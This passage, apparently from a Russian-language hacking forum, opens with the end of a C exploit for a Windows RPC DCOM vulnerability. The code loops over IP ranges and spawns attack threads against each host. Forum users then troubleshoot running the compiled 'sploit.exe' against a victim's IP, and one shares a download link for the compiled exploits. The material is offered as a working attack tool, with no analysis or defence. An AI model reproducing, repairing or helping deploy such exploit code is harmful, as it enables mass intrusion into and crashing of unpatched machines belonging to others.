"modification and shellcode (c) by karlss0n\n"
"downloaded on www.k-otik.com\n"
"\n"
"usage: %s <target_ip>\n",
argv[0]);
return 10;
}

WSADATA wsaData;

int wVersionRequested;
wVersionRequested = MAKEWORD( 2, 2 );

int err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 ) {
/* Tell the user that we could not find a usable */
/* WinSock DLL. */
return 1;
}


if(strchr(argv[1],'.'))
{
attack(argv[1],1);
Sleep(20000);
return 2;
}
int cb=1,db=1;
cb=atoi(argv[3]);
db=atoi(argv[4]);
long tm=atoi(argv[5]);
for(int c=cb;c<255;c++)
{
for(int d=db;d<255;d++)
{
sprintf(adr,"%s.%s.%d.%d",argv[1],argv[2],c,d);
if(thread_count>tm) while(thread_count>tm) Sleep(100);
CreateThread(NULL,0,&ThreadProc,(void *)"",0,NULL);
Sleep(10);
fflush(fp1);
}
}
Sleep(60000);
fclose(fp1);
return 0;

}

// milw0rm.com [2003-10-09]
-----------------------------------------------
этот скомпилился, но када запускаешь выдаёт следующее:
без ввода параметров
C:\Documents and Settings\Администратор>"C:\Documents and Settings\Администратор
\Рабочий стол\sploit.exe"
RPC universal exploit. Exploit MS09-039 vulnerability
unpatched host - to codee xecution
patched host - to DoS
based on original XFocus RPCDCOM2 exploit
modification and shellcode (c) by karlss0n
downloaded on www.k-otik.com

usage: C:\Documents and Settings\└фьшэшёЄЁрЄюЁ\╨рсюўшщ ёЄюы\sploit.exe <target_i
p>
с вводом параметра (*.*.*.* - ip жертвы)
C:\Documents and Settings\Администратор>"C:\Documents and Settings\Администратор
\Рабочий стол\sploit.exe" *.*.*.*
*.*.*.*

C:\Documents and Settings\Администратор>

вопщем помогите кто чем может
ссылки на милворм:
1 сплоит http://milw0rm.com/exploits/103
2 сплоит http://milw0rm.com/exploits/109

4ем компилишь? я http://milw0rm.com/exploits/103 скомпилил в Visual норм!

На оба сплоента скомпиленых
http://www.sendspace.com/file/z0frfs

мде, лаконично...